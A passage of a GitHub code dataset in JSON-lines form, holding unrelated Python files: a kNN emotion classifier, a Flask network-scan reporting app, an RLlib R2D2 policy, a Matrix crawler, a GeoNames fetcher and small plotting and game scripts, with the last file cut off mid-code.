logging.WARNING\n\tif 'log_level' in config:\n\t\tlog_level = getattr(logging, config['log_level'].upper())\n\troot = logging.getLogger()\n\troot.setLevel(log_level)\n\n\tlog_path = config.get('log_path', 'stdout')\n\tif not log_path or log_path == 'stdout':\n\t\thandler = logging.StreamHandler(sys.stdout)\n\telif log_path == 'stderr':\n\t\thandler = logging.StreamHandler(sys.stderr)\n\telif log_path:\n\t\thandler = logging.StreamHandler(log_path)\n\n\thandler.setLevel(log_level)\n\n\t# define the logging format\n\tformatter = logging.Formatter('[%(asctime)s] [%(levelname)8s] [%(name)s] %(message)s')\n\thandler.setFormatter(formatter)\n\n\t# add the logging handler for all loggers\n\troot.addHandler(handler)\n","repo_name":"anlutro/prove-cm","sub_path":"prove/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30880354895","text":"from random import randint\nimport math\nimport numpy as np\nimport pandas as pd\nimport operator\n\n\nclass knn:\n\n\tsizeData = 134\n\tdata = None\n\n\t# lista de tuplas [indice do elemento no dataframe,distancia] \n\tdistList = [[0,1000],[0,1000],[0,1000],[0,1000],[0,1000]]\n \n\n\n\tdef __init__( self, sizeDataE, data ):\n\t\tself.sizeData = sizeDataE\n\t\tself.data = data\n\n\n\tdef calculate( self, newData ):\n\n\t\t# Mede a distância do novo dado com todos os outros dados que já estão classificados\n\t\t# percorre o dataframe\n\t\tfor index in range( len( self.data ) ):\n\t\t\t\n\n\t\t\t# computa a distancia de manhattan entre os pontos do dataframe e o novo ponto\n\t\t\tdist = self.manhattanDistance( newData, index )\n\n\n\t\t\t# obtém as k menores distâncias (vai salvando em um array)\t\n\t\t\t# encontra elemento com maior distancia\n\t\t\tmaior = self.distList[0][1]\n\t\t\tindexMaior = 0\t\n\t\t\tfor i in range(len( self.distList ) ):\n\t\t\t\tif( self.distList[i][1] > maior ):\n\t\t\t\t\tmaior = self.distList[i][1]\n\t\t\t\t\tindexMaior = i\n\n\n\t\t\tif( dist < maior ):\n\t\t\t\tself.distList[indexMaior] = [index, dist]\n\n\n\t\treturn self.classifier()\n\t\n\n\n\tdef classifier( self ):\n\n\t\tfake = 0\n\t\tgenuine = 0\n\n\t\t# percorre a classe dos dados de menor distância e conta a quantidade que aparece de cada classe (fake or genuine)\n\t\tfor elem in self.distList:\n\t\t\tfakeGenuine = int(self.data.iloc[elem[0], 2])\n\t\t\n\t\t\tif( fakeGenuine == 1 ):\n\t\t\t\tfake += 1\n\t\t\telif( fakeGenuine == 0 ):\n\t\t\t\tgenuine += 1\n\n\t\t# Toma como resultado a classe que mais apareceu dentre os dados que tiveram as menores distâncias\n\t\tif( fake > genuine ):\n\t\t\treturn \"fake\"\n\t\telse:\n\t\t\treturn \"genuine\"\n\t\t\n\n\tdef manhattanDistance( self, k, x ):\n\t\t\n\t\tresult = 0.0\n\t\t\n\t\t# recupera cada um dos valores dos FVs da base de dados de x e de k\n\t\tcount = 0\n\t\tfor fv in range(21, 34):\n\n\t\t\tvx = int(self.data.iloc[x, fv])\n\t\t\tvk = int(k[count])\n\n\t\t\txkSum = ( vx - vk )\n\t\t\tif( xkSum < 0 ):\n\t\t\t\txkSum *= (-1)\n\n\t\t\tresult += xkSum\n\t\t\tcount += 1\n\n\t\treturn result\n\n\n\n\ndata = pd.read_csv('facialFeatures.csv') \n\n\nhappy = data[data[\"emotion\"] == \"happy\"]\nsad = data[data[\"emotion\"] == \"sad\"]\n\n\n# valores dos feature values do novo dado coletado\nnewData = happy.iloc[0, 21 :]\n\n\nknnSad = knn( len(happy), happy )\nprint( knnSad.calculate( newData ) )","repo_name":"JaineBudke/fake_emotion_analysis","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"28248606840","text":"from flask import Flask, render_template, request, url_for, send_file\nimport os\nimport mongo_connection\nimport localscan\nimport cloud_scan\nimport network_diagram\nimport docx_creation\nimport time\napp = Flask(__name__)\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef forside():\n \"\"\"\n -> scan.html\n \"\"\"\n return render_template('scan.html')\n\n\n@app.route('/scan', methods=['POST', 'GET'])\ndef scan():\n \"\"\"\n -> scan.html\n \"\"\"\n if request.method == 'POST':\n\n options = {\n \"company_name\": request.form.get(\"customer\"),\n \"port_scan\": 'ports' in request.form,\n \"port_range\": request.form.get(\"port-range\"),\n \"port_speed\": request.form.get(\"port-speed\"),\n \"os_detection\": 'os' in request.form,\n \"own_ip\": 'own-ip' in request.form,\n \"exclude_other_ip\": request.form.get(\"other-ip\"),\n \"client_id\": request.form.get(\"client-id\"),\n \"tenant-id\": request.form.get(\"tenant-id\"),\n \"secret-value\": request.form.get(\"secret-value\"),\n \"subscription-id\": request.form.get(\"subscription-id\"),\n }\n if options[\"client_id\"] != '' and options[\"tenant-id\"] != '' and options['secret-value'] != '' and options['subscription-id'] != '':\n cloud_scan.export_azure_info(company_name=options['company_name'],\n client_id=options['client_id'],\n tentant=options[\"tenant-id\"],\n secret=options[\"secret-value\"],\n sub=options['subscription-id'])\n network_diagram.make_cloud_diagram(company_name=options['company_name'])\n localscan.network_scan(port_scan=bool(options['port_scan']),\n port_range=options['port_range'],\n port_scan_speed=options[\"port_speed\"],\n os_scan=bool(options[\"os_detection\"]),\n exclude_own_ip=bool(options['own_ip']),\n company_name=options['company_name']\n )\n time.sleep(0.5)\n network_diagram.make_local_diagram(company_name=options['company_name'])\n try:\n del(request.method)\n except:\n pass\n return render_template('scan.html')\n else:\n return render_template('scan.html')\n\n\n@app.route('/eksport', methods=['POST', 'GET'])\ndef eksport():\n \"\"\"\n -> eksport.html\n \"\"\"\n json_files = os.listdir(\"/home/pi/Documents/final/scan-results\")\n diagrams = os.listdir(\"/home/pi/Documents/final/network_diagrams\")\n report_list = []\n for i in diagrams:\n for x in json_files:\n if i[0:-12] == x[0:-10]:\n report_list.append(i[0:-18])\n if request.method == 'POST':\n print(\"making report\")\n company = request.form.get(\"report_company\")\n print(company)\n docx_creation.report_generation(company_name=company)\n os.remove(f\"/home/pi/Documents/final/network_diagrams/{company}_local_diagram.png\")\n os.remove(f\"/home/pi/Documents/final/scan-results/{company}_local_scan.json\")\n try:\n os.remove(f\"/home/pi/Documents/final/network_diagrams/{company}_cloud_diagram.png\")\n os.remove(f\"/home/pi/Documents/final/scan-results/{company}_cloud_scan.json\")\n except:\n pass\n p1 = mongo_connection.mongodb_control()\n p1.docx_upload(file_path=f\"/home/pi/Documents/final/generated_report/{company}_network_scan.docx\", costumer_name=company)\n return render_template('eksport.html', reports=report_list)\n else:\n return render_template('eksport.html', reports=report_list)\n\n\n@app.route('/database', methods=['POST', 'GET'])\ndef database():\n \"\"\"\n -> database.html\n \"\"\"\n for file in os.listdir(r\"/home/pi/Documents/final/file_to_send\"):\n os.remove(f\"/home/pi/Documents/final/file_to_send/{file}\")\n p1 = mongo_connection.mongodb_control()\n if request.method == 'POST':\n path = p1.docx_download(request.form.get(\"serienummer\"))\n return send_file(path)\n else:\n return render_template('database.html', all_data=p1.get_all_docx())\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\")\n","repo_name":"Nicolaj-J/IT-teknolog_Afsluttende-projekt","sub_path":"Final/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41265406554","text":"\"\"\" Napisz funkcję, która przyjmuje listę wyrazów jako parametr wejściowy. Funkcja losuje jeden z wyrazów jako wyraz do odgadnięcia.\nNastępnie losowana jest jedna litera tego wyrazu i na wyjściu wyświetlany jest ten niekompletny wyraz, np. wylosowany wyraz to\npiłka, wyświetlane jest _ _ ł _ _. Użytkownik wpisuje wyraz o który może chodzić, próbując go odgadnąć, jeżeli zgadł to wyświetlany\njest stosowny komunikat i liczba prób, które były konieczne do odgadnięcia wyrazu. Przy każdej nieudanej próbie losowana jest\nkolejna litera tego wyrazu, funkcja kończy działanie po odgadnięciu lub wylosowaniu ostatniej litery wyrazu. \"\"\"\nimport random,string\ndef losy(lista):\n x = list(string.ascii_lowercase)\n random.seed()\n z = random.choice(lista)\n y = random.choice(z)\n x.remove(y)\n for k in range(0,len(x)):\n z.replace(x[k],'_')\n print(z)\n \nlista = [\"pilka\",\"robak\",\"pies\",\"walec\"]\nlosy(lista)","repo_name":"sebastianceloch/wd_io","sub_path":"kolos1/zadanie7.py","file_name":"zadanie7.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23575339784","text":"\"\"\"TensorFlow policy class used for R2D2.\"\"\"\n\nfrom typing import Dict, List, Optional, Tuple\n\nimport gymnasium as gym\n\nimport ray\nfrom ray.rllib.algorithms.dqn.dqn_tf_policy import (\n PRIO_WEIGHTS,\n build_q_model,\n clip_gradients,\n compute_q_values,\n postprocess_nstep_and_prio,\n)\nfrom ray.rllib.models.action_dist import ActionDistribution\nfrom ray.rllib.models.modelv2 import ModelV2\nfrom ray.rllib.models.tf.tf_action_dist import Categorical\nfrom ray.rllib.models.torch.torch_action_dist import TorchCategorical\nfrom ray.rllib.policy.policy import Policy\nfrom ray.rllib.policy.sample_batch import SampleBatch\nfrom ray.rllib.policy.tf_mixins import LearningRateSchedule, TargetNetworkMixin\nfrom ray.rllib.policy.tf_policy_template import build_tf_policy\nfrom ray.rllib.utils.framework import try_import_tf\nfrom ray.rllib.utils.tf_utils import huber_loss\nfrom ray.rllib.utils.typing import AlgorithmConfigDict, ModelInputDict, TensorType\n\ntf1, tf, tfv = try_import_tf()\n\n\ndef build_r2d2_model(\n policy: Policy,\n obs_space: gym.spaces.Space,\n action_space: gym.spaces.Space,\n config: AlgorithmConfigDict,\n) -> Tuple[ModelV2, ActionDistribution]:\n \"\"\"Build q_model and target_model for DQN\n\n Args:\n policy: The policy, which will use the model for optimization.\n obs_space (gym.spaces.Space): The policy's observation space.\n action_space (gym.spaces.Space): The policy's action space.\n config (AlgorithmConfigDict):\n\n Returns:\n q_model\n Note: The target q model will not be returned, just assigned to\n `policy.target_model`.\n \"\"\"\n\n # Create the policy's models.\n model = build_q_model(policy, obs_space, action_space, config)\n\n # Assert correct model type by checking the init state to be present.\n # For attention nets: These don't necessarily publish their init state via\n # Model.get_initial_state, but may only use the trajectory view API\n # (view_requirements).\n assert (\n model.get_initial_state() != []\n or model.view_requirements.get(\"state_in_0\") is not None\n ), (\n \"R2D2 requires its model to be a recurrent one! Try using \"\n \"`model.use_lstm` or `model.use_attention` in your config \"\n \"to auto-wrap your model with an LSTM- or attention net.\"\n )\n\n return model\n\n\ndef r2d2_loss(policy: Policy, model, _, train_batch: SampleBatch) -> TensorType:\n \"\"\"Constructs the loss for R2D2TFPolicy.\n\n Args:\n policy: The Policy to calculate the loss for.\n model (ModelV2): The Model to calculate the loss for.\n train_batch: The training data.\n\n Returns:\n TensorType: A single loss tensor.\n \"\"\"\n config = policy.config\n\n # Construct internal state inputs.\n i = 0\n state_batches = []\n while \"state_in_{}\".format(i) in train_batch:\n state_batches.append(train_batch[\"state_in_{}\".format(i)])\n i += 1\n assert state_batches\n\n # Q-network evaluation (at t).\n q, _, _, _ = compute_q_values(\n policy,\n model,\n train_batch,\n state_batches=state_batches,\n seq_lens=train_batch.get(SampleBatch.SEQ_LENS),\n explore=False,\n is_training=True,\n )\n\n # Target Q-network evaluation (at t+1).\n q_target, _, _, _ = compute_q_values(\n policy,\n policy.target_model,\n train_batch,\n state_batches=state_batches,\n seq_lens=train_batch.get(SampleBatch.SEQ_LENS),\n explore=False,\n is_training=True,\n )\n\n if not hasattr(policy, \"target_q_func_vars\"):\n policy.target_q_func_vars = policy.target_model.variables()\n\n actions = tf.cast(train_batch[SampleBatch.ACTIONS], tf.int64)\n dones = tf.cast(train_batch[SampleBatch.TERMINATEDS], tf.float32)\n rewards = train_batch[SampleBatch.REWARDS]\n weights = tf.cast(train_batch[PRIO_WEIGHTS], tf.float32)\n\n B = tf.shape(state_batches[0])[0]\n T = tf.shape(q)[0] // B\n\n # Q scores for actions which we know were selected in the given state.\n one_hot_selection = tf.one_hot(actions, policy.action_space.n)\n q_selected = tf.reduce_sum(\n tf.where(q > tf.float32.min, q, tf.zeros_like(q)) * one_hot_selection, axis=1\n )\n\n if config[\"double_q\"]:\n best_actions = tf.argmax(q, axis=1)\n else:\n best_actions = tf.argmax(q_target, axis=1)\n\n best_actions_one_hot = tf.one_hot(best_actions, policy.action_space.n)\n q_target_best = tf.reduce_sum(\n tf.where(q_target > tf.float32.min, q_target, tf.zeros_like(q_target))\n * best_actions_one_hot,\n axis=1,\n )\n\n if config[\"num_atoms\"] > 1:\n raise ValueError(\"Distributional R2D2 not supported yet!\")\n else:\n q_target_best_masked_tp1 = (1.0 - dones) * tf.concat(\n [q_target_best[1:], tf.constant([0.0])], axis=0\n )\n\n if config[\"use_h_function\"]:\n h_inv = h_inverse(q_target_best_masked_tp1, config[\"h_function_epsilon\"])\n target = h_function(\n rewards + config[\"gamma\"] ** config[\"n_step\"] * h_inv,\n config[\"h_function_epsilon\"],\n )\n else:\n target = (\n rewards + config[\"gamma\"] ** config[\"n_step\"] * q_target_best_masked_tp1\n )\n\n # Seq-mask all loss-related terms.\n seq_mask = tf.sequence_mask(train_batch[SampleBatch.SEQ_LENS], T)[:, :-1]\n # Mask away also the burn-in sequence at the beginning.\n burn_in = policy.config[\"replay_buffer_config\"][\"replay_burn_in\"]\n # Making sure, this works for both static graph and eager.\n if burn_in > 0:\n seq_mask = tf.cond(\n pred=tf.convert_to_tensor(burn_in, tf.int32) < T,\n true_fn=lambda: tf.concat(\n [tf.fill([B, burn_in], False), seq_mask[:, burn_in:]], 1\n ),\n false_fn=lambda: seq_mask,\n )\n\n def reduce_mean_valid(t):\n return tf.reduce_mean(tf.boolean_mask(t, seq_mask))\n\n # Make sure to use the correct time indices:\n # Q(t) - [gamma * r + Q^(t+1)]\n q_selected = tf.reshape(q_selected, [B, T])[:, :-1]\n td_error = q_selected - tf.stop_gradient(tf.reshape(target, [B, T])[:, :-1])\n td_error = td_error * tf.cast(seq_mask, tf.float32)\n weights = tf.reshape(weights, [B, T])[:, :-1]\n policy._total_loss = reduce_mean_valid(weights * huber_loss(td_error))\n # Store the TD-error per time chunk (b/c we need only one mean\n # prioritized replay weight per stored sequence).\n policy._td_error = tf.reduce_mean(td_error, axis=-1)\n policy._loss_stats = {\n \"mean_q\": reduce_mean_valid(q_selected),\n \"min_q\": tf.reduce_min(q_selected),\n \"max_q\": tf.reduce_max(q_selected),\n \"mean_td_error\": reduce_mean_valid(td_error),\n }\n\n return policy._total_loss\n\n\ndef h_function(x, epsilon=1.0):\n \"\"\"h-function to normalize target Qs, described in the paper [1].\n\n h(x) = sign(x) * [sqrt(abs(x) + 1) - 1] + epsilon * x\n\n Used in [1] in combination with h_inverse:\n targets = h(r + gamma * h_inverse(Q^))\n \"\"\"\n return tf.sign(x) * (tf.sqrt(tf.abs(x) + 1.0) - 1.0) + epsilon * x\n\n\ndef h_inverse(x, epsilon=1.0):\n \"\"\"Inverse if the above h-function, described in the paper [1].\n\n If x > 0.0:\n h-1(x) = [2eps * x + (2eps + 1) - sqrt(4eps x + (2eps + 1)^2)] /\n (2 * eps^2)\n\n If x < 0.0:\n h-1(x) = [2eps * x + (2eps + 1) + sqrt(-4eps x + (2eps + 1)^2)] /\n (2 * eps^2)\n \"\"\"\n two_epsilon = epsilon * 2\n if_x_pos = (\n two_epsilon * x\n + (two_epsilon + 1.0)\n - tf.sqrt(4.0 * epsilon * x + (two_epsilon + 1.0) ** 2)\n ) / (2.0 * epsilon**2)\n if_x_neg = (\n two_epsilon * x\n - (two_epsilon + 1.0)\n + tf.sqrt(-4.0 * epsilon * x + (two_epsilon + 1.0) ** 2)\n ) / (2.0 * epsilon**2)\n return tf.where(x < 0.0, if_x_neg, if_x_pos)\n\n\nclass ComputeTDErrorMixin:\n \"\"\"Assign the `compute_td_error` method to the R2D2TFPolicy\n\n This allows us to prioritize on the worker side.\n \"\"\"\n\n def __init__(self):\n def compute_td_error(\n obs_t, act_t, rew_t, obs_tp1, terminateds_mask, importance_weights\n ):\n input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t})\n input_dict[SampleBatch.ACTIONS] = act_t\n input_dict[SampleBatch.REWARDS] = rew_t\n input_dict[SampleBatch.NEXT_OBS] = obs_tp1\n input_dict[SampleBatch.TERMINATEDS] = terminateds_mask\n input_dict[PRIO_WEIGHTS] = importance_weights\n\n # Do forward pass on loss to update td error attribute\n r2d2_loss(self, self.model, None, input_dict)\n\n return self._td_error\n\n self.compute_td_error = compute_td_error\n\n\ndef get_distribution_inputs_and_class(\n policy: Policy,\n model: ModelV2,\n *,\n input_dict: ModelInputDict,\n state_batches: Optional[List[TensorType]] = None,\n seq_lens: Optional[TensorType] = None,\n explore: bool = True,\n is_training: bool = False,\n **kwargs\n) -> Tuple[TensorType, type, List[TensorType]]:\n\n if policy.config[\"framework\"] == \"torch\":\n from ray.rllib.algorithms.r2d2.r2d2_torch_policy import (\n compute_q_values as torch_compute_q_values,\n )\n\n func = torch_compute_q_values\n else:\n func = compute_q_values\n\n q_vals, logits, probs_or_logits, state_out = func(\n policy, model, input_dict, state_batches, seq_lens, explore, is_training\n )\n\n policy.q_values = q_vals\n if not hasattr(policy, \"q_func_vars\"):\n policy.q_func_vars = model.variables()\n\n action_dist_class = (\n TorchCategorical if policy.config[\"framework\"] == \"torch\" else Categorical\n )\n\n return policy.q_values, action_dist_class, state_out\n\n\ndef adam_optimizer(\n policy: Policy, config: AlgorithmConfigDict\n) -> \"tf.keras.optimizers.Optimizer\":\n return tf1.train.AdamOptimizer(\n learning_rate=policy.cur_lr, epsilon=config[\"adam_epsilon\"]\n )\n\n\ndef build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]:\n return dict(\n {\n \"cur_lr\": policy.cur_lr,\n },\n **policy._loss_stats\n )\n\n\ndef setup_early_mixins(\n policy: Policy, obs_space, action_space, config: AlgorithmConfigDict\n) -> None:\n LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"])\n\n\ndef before_loss_init(\n policy: Policy,\n obs_space: gym.spaces.Space,\n action_space: gym.spaces.Space,\n config: AlgorithmConfigDict,\n) -> None:\n ComputeTDErrorMixin.__init__(policy)\n\n\ndef setup_late_mixins(\n policy: Policy,\n obs_space: gym.spaces.Space,\n action_space: gym.spaces.Space,\n config: AlgorithmConfigDict,\n) -> None:\n TargetNetworkMixin.__init__(policy)\n\n\nR2D2TFPolicy = build_tf_policy(\n name=\"R2D2TFPolicy\",\n loss_fn=r2d2_loss,\n get_default_config=lambda: ray.rllib.algorithms.r2d2.r2d2.R2D2Config(),\n postprocess_fn=postprocess_nstep_and_prio,\n stats_fn=build_q_stats,\n make_model=build_r2d2_model,\n action_distribution_fn=get_distribution_inputs_and_class,\n optimizer_fn=adam_optimizer,\n extra_action_out_fn=lambda policy: {\"q_values\": policy.q_values},\n compute_gradients_fn=clip_gradients,\n extra_learn_fetches_fn=lambda policy: {\"td_error\": policy._td_error},\n before_init=setup_early_mixins,\n before_loss_init=before_loss_init,\n after_init=setup_late_mixins,\n mixins=[\n TargetNetworkMixin,\n ComputeTDErrorMixin,\n LearningRateSchedule,\n ],\n)\n","repo_name":"ray-project/ray","sub_path":"rllib_contrib/r2d2/src/rllib_r2d2/r2d2/r2d2_tf_policy.py","file_name":"r2d2_tf_policy.py","file_ext":"py","file_size_in_byte":11627,"program_lang":"python","lang":"en","doc_type":"code","stars":28715,"dataset":"github-code","pt":"86"} +{"seq_id":"1563223226","text":"from apiconfig.config import settings\nfrom database.core import Base\nfrom database.utils import DateTimeUtcNow, pre_populate_from_tsv\nfrom sqlalchemy import Column, ForeignKey, Integer, Sequence, String\nfrom sqlalchemy.event import listens_for\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.types import DateTime\n\n\nclass GoogleUser(Base):\n __tablename__ = \"google_user\"\n\n id = Column(\n Integer,\n Sequence(\"google_user_id_seq\", start=3, increment=1),\n primary_key=True,\n index=True,\n )\n user_id = Column(Integer, ForeignKey(\"user.id\", ondelete=\"CASCADE\"), nullable=False)\n email = Column(String)\n sub = Column(String, unique=True)\n\n picture = Column(String(500), nullable=True)\n\n fullname = Column(String(100), nullable=True)\n given_name = Column(String(50), nullable=True)\n family_name = Column(String(50), nullable=True)\n\n date_created = Column(DateTime, nullable=False, server_default=DateTimeUtcNow())\n\n role_id = Column(Integer, ForeignKey(\"role.id\"), nullable=False)\n role = relationship(\"Role\")\n\n\n@listens_for(GoogleUser.__table__, \"after_create\")\ndef pre_populate_google_user(target, connection, **kw):\n pre_populate_from_tsv(settings.db.initial_data_dir / \"google_user.tsv\", target, connection)\n","repo_name":"deeppavlov/dream-builder","sub_path":"database/models/google_user/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"32271848849","text":"from matrix_client.api import MatrixHttpApi\nfrom matrix_client.client import MatrixClient\nfrom matrix_client.room import Room\n\nclass CrawlerMatrixClient:\n def __init__(self, token, server, roomid):\n self.server = server\n self.roomid = roomid\n self.token = token\n self.APIWrapper = MatrixHttpApi(\"https://{}\".format(self.server), token=self.token)\n self.next_batch = self.APIWrapper.sync().get(\"next_batch\")\n print(\"client initialized\")\n def getChunk(self):\n b = self.APIWrapper.get_room_messages(self.roomid, self.next_batch, \"b\", limit=100)\n c = b.get(\"chunk\")\n self.next_batch = b.get(\"end\")\n return c\n def dump_message_events(self, message_count, output_file):\n events = []\n try:\n message_count = self.try_recover_suspend(output_file, events, message_count)\n except:\n pass\n try:\n count = message_count // 100\n for progress in range(count):\n chunk = self.getChunk()\n for element in chunk:\n events.append(element.get(\"origin_server_ts\"))\n print(\"haha progress bar go brr {} out of {}\".format(progress, count), end='\\r')\n with open(output_file, \"w+\") as handle:\n for element in events:\n handle.write(str(element))\n handle.write(\"\\n\")\n except KeyboardInterrupt:\n self.suspend(events, output_file)\n def try_recover_suspend(self, output_file, events, message_count):\n with open(output_file, \"r\") as handle:\n a = handle.readlines()\n if a[len(a)-1] == \"sus\":\n print(\"restoring from suspend\")\n self.next_batch = a[len(a)-2]\n a = a[:-2]\n for element in a:\n events.append(element.strip())\n return message_count - len(a) + 1 \n\n def suspend(self, processed_events, output_file):\n print(\"suspending to output_file\")\n with open(output_file, \"w+\") as handle:\n for element in processed_events:\n handle.write(str(element))\n handle.write(\"\\n\")\n handle.write(self.next_batch)\n handle.write(\"\\n\")\n handle.write(\"sus\")\nif __name__ == \"__main__\":\n Client = CrawlerMatrixClient(open(\"secret.txt\", \"r\").read(), \"matrix.org\", \"!KIwsdPeEnTTmPnMpMv:fam-ribbers.com\")\n Client.dump_message_events(400000, \"the_grand_dump_mainl1ne\")","repo_name":"nergzd723/matrix-data-crawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71878714525","text":"import matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nimport numpy as np\r\n\r\nplt.figure(figsize = (5,7))\r\n\r\nplt.subplot()\r\n\r\nfig = plt.figure(figsize=(5,7))\r\nspec = fig.add_gridspec(ncols=1, nrows=2, height_ratios=[5,2])\r\n\r\nax1 = fig.add_subplot(spec[0,0])\r\nplt.title('infection simulation')\r\n\r\nax2 = fig.add_subplot(spec[1,0])\r\nax2.set_title('number of infected')\r\n#ax2.set_xlim(0, simulation_steps)\r\n\r\nax1.clear()\r\nax2.clear()\r\n\r\n\r\nplt.show()","repo_name":"bodleim/matplotlibExample","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41779158947","text":"import csv\nimport httplib2\nimport lxml\nimport os\nimport sys\nimport time\nfrom bs4 import BeautifulSoup\nfrom rdflib import Graph, Literal, Namespace, URIRef\nfrom rdflib.namespace import RDFS\nfrom rdflib.plugins.serializers.nt import NTSerializer\nfrom tqdm import tqdm\n\ngPlaces = Graph()\ngn = Namespace('http://www.geonames.org/ontology#')\nwgs84_pos = Namespace('http://www.w3.org/2003/01/geo/wgs84_pos#')\n\nfilePath_1 = sys.argv[1]\n\nwith open(filePath_1, newline=None) as f1:\n reader = csv.reader(f1, dialect='excel', delimiter=',', quotechar='\"')\n next(reader, None) # skip the headers\n geoURIs = list(reader)\n for item in tqdm(geoURIs, desc='Getting GeoNames data', total=len(geoURIs)):\n if not item:\n continue\n geoURI = item[0]\n uri = ''.join([geoURI, 'about.rdf'])\n h = httplib2.Http()\n resp, rdf_doc = h.request(uri, \"GET\")\n time.sleep(1)\n soup = BeautifulSoup(rdf_doc, \"xml\")\n\n for tag in soup.find_all(\"name\"):\n name = tag.text\n gPlaces.add( (URIRef(geoURI), RDFS.label, Literal(name)) )\n\n for tag in soup.find_all(\"parentCountry\"):\n country = tag.attrs['rdf:resource']\n gPlaces.add( (URIRef(geoURI), gn.parentCountry, URIRef(country) ) )\n\n for tag in soup.find_all(\"lat\"):\n lat = tag.text\n gPlaces.add( (URIRef(geoURI), wgs84_pos.lat, Literal(lat)) )\n\n for tag in soup.find_all(\"long\"):\n long = tag.text\n gPlaces.add( (URIRef(geoURI), wgs84_pos.long, Literal(long)) )\n\nplaces_graph_path = os.path.join(\n os.path.dirname(__file__), os.pardir, 'Graphs', 'placesGraph.nt')\n\ngPlaces.bind(\"gn\", gn)\ngPlaces.bind(\"rdfs\", RDFS)\ngPlaces.bind(\"wgs84_pos\", wgs84_pos)\n\ngPlaces = gPlaces.serialize(destination=places_graph_path, format='nt', encoding='utf-8')\n\nprint('Finished getting geo info')\n","repo_name":"CarnegieHall/linked-data","sub_path":"scripts/get_geoInfo.py","file_name":"get_geoInfo.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"86"} +{"seq_id":"6385551254","text":"import numpy as N\nimport pylab as P\n\ndx = (0.663, 0.007) #X start position, X width\ndy = (-0.191, 0.007) #Y start position, Y width\nv = N.zeros((1024,1024), \"uint8\") #The color matrix\n\n#Create the const. matrix and initialize\nc = N.zeros((1024,1024), \"complex\")\nc[:].real = N.linspace(dy[0],dy[0]+dy[1],\n c.shape[0])[:,N.newaxis]\nc[:].imag = N.linspace(dx[0],dx[0]+dx[1],\n c.shape[1])[N.newaxis,:]\nz = c.copy() # The z function is initialized from c\nfor it in xrange(256): # Use 256 colors\n z *= z # Compute z = z*z\n z += c # Compute z = z + c\n # Set colors for which z has diverged\n v += (N.abs(z) >= 4)*(v == 0)*it\nP.imgshow(v) # Display the image\nP.show()","repo_name":"odGit/fractals_python","sub_path":"mandel2.py","file_name":"mandel2.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"24138348707","text":"def minmax_decision(state):\n\n def max_value(state):\n if is_terminal(state):\n return utility_of(state)\n v = -infinity\n for (a, s) in successors_of(state):\n v = max(v, min_value(s))\n print('V: ' + str(v))\n return v\n\n def min_value(state):\n if is_terminal(state):\n return utility_of(state)\n v = infinity\n for (a, s) in successors_of(state):\n v = min(v, max_value(s))\n return v\n\n infinity = float('inf')\n action, state = argmax(successors_of(state), lambda a: min_value(a[1]))\n return action\n\n\ndef is_terminal(state):\n \"\"\"\n returns True if the state is either a win or a tie (board full)\n :param state: State of the checkerboard. Ex: [0; 1; 2; 3; X; 5; 6; 7; 8]\n :return:\n \"\"\"\n\n # check for tie (board full)\n xCount = state.count(\"X\")\n oCount = state.count(\"O\")\n if xCount + oCount == 9:\n return True\n\n # check for win: there are 8 winning combinations\n if state[0] == state[1] == state[2] or \\\n state[3] == state[4] == state[5] or \\\n state[6] == state[7] == state[8] or \\\n state[0] == state[3] == state[6] or \\\n state[1] == state[4] == state[7] or \\\n state[2] == state[5] == state[8] or \\\n state[0] == state[4] == state[8] or \\\n state[2] == state[4] == state[6]:\n return True\n\n return False\n\n\ndef utility_of(state):\n \"\"\"\n returns +1 if winner is X (MAX player), -1 if winner is O (MIN player), or 0 otherwise\n :param state: State of the checkerboard. Ex: [0; 1; 2; 3; X; 5; 6; 7; 8]\n :return:\n \"\"\"\n\n xCount = state.count(\"X\")\n oCount = state.count(\"O\")\n\n # there cannot be a tie if the board is unfilled\n if xCount + oCount != 9:\n if xCount == oCount:\n # O made last move and won\n return -1\n else:\n # X made last move and won\n return 1\n \n # check if we have a winner or a tie\n # if there is a winner, and the board is full, it has to be X\n if state[0] == state[1] == state[2] or \\\n state[3] == state[4] == state[5] or \\\n state[6] == state[7] == state[8] or \\\n state[0] == state[3] == state[6] or \\\n state[1] == state[4] == state[7] or \\\n state[2] == state[5] == state[8] or \\\n state[0] == state[4] == state[8] or \\\n state[2] == state[4] == state[6]:\n return 1\n\n return 0\n\n\ndef successors_of(state):\n \"\"\"\n returns a list of tuples (move, state) as shown in the exercise slides\n :param state: State of the checkerboard. Ex: [0; 1; 2; 3; X; 5; 6; 7; 8]\n :return:\n \"\"\"\n\n successors = []\n player_token = \"\"\n\n xCount = state.count(\"X\")\n oCount = state.count(\"O\")\n\n if xCount == oCount:\n # X's turn\n player_token = \"X\"\n else:\n # O's turn\n player_token = \"O\"\n \n # check every field\n for i 